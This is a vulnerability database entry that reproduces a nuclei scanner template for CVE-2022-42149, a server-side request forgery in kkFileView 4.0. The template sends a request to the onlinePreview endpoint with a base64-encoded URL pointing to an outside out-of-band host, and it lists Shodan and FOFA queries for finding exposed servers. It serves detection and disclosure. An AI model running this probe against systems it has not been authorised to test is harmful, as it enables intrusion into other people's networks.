Lucene search
K

kkFileView 4.0 - Server-Side Request Forgery

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

kkFileView 4.0 permits server side forgery enabling arbitrary server requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-42149
18 Oct 202200:13
circl
CNNVD
Keking kkFileView 代码问题漏洞
17 Oct 202200:00
cnnvd
CVE
CVE-2022-42149
17 Oct 202200:00
cve
Cvelist
CVE-2022-42149
17 Oct 202200:00
cvelist
EUVD
EUVD-2022-45226
3 Oct 202520:07
euvd
NVD
CVE-2022-42149
17 Oct 202220:15
nvd
Prion
Server side request forgery (ssrf)
17 Oct 202220:15
prion
RedhatCVE
CVE-2022-42149
9 Jan 202610:51
redhatcve
Vulnrichment
CVE-2022-42149
17 Oct 202200:00
vulnrichment
id: CVE-2022-42149

info:
  name: kkFileView 4.0 - Server-Side Request Forgery
  author: Arm!tage
  severity: critical
  description: |
    kkFileView 4.0 contains a server-side request forgery caused by improper validation in OnlinePreviewController.java, letting attackers induce the server to make arbitrary requests, exploit requires sending crafted requests.
  impact: |
    Unauthenticated attackers can exploit SSRF to make the server fetch arbitrary URLs, potentially accessing internal services, bypassing firewall restrictions, and exfiltrating sensitive data from internal networks.
  remediation: |
    Update kkFileView to a version newer than 4.0 that properly validates URL parameters and restricts requests to trusted sources.
  reference:
    - https://github.com/kekingcn/kkFileView/issues/296
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42149
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-42149
    cwe-id: CWE-918
    epss-score: 0.42841
    epss-percentile: 0.97546
    cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - app="kkFileView"
      - app="kkfileview"
      - body="kkfileview"
  tags: cve,cve2022,ssrf,kkfileview,keking,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}"

    extractors:
      - type: regex
        name: data
        group: 1
        regex:
          - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>'
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains(base64_decode(data), "Disallow")
# digest: 4b0a00483046022100916e11809e88dc0a16e02846dc2d4faf61c373f21058716d8feda59706e1592c022100cfbf1fed113e3b84c596ee1939dfb2aaf05cd75bfb9ad9d2a8035d9d8f75f0fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.42841
SSVC
11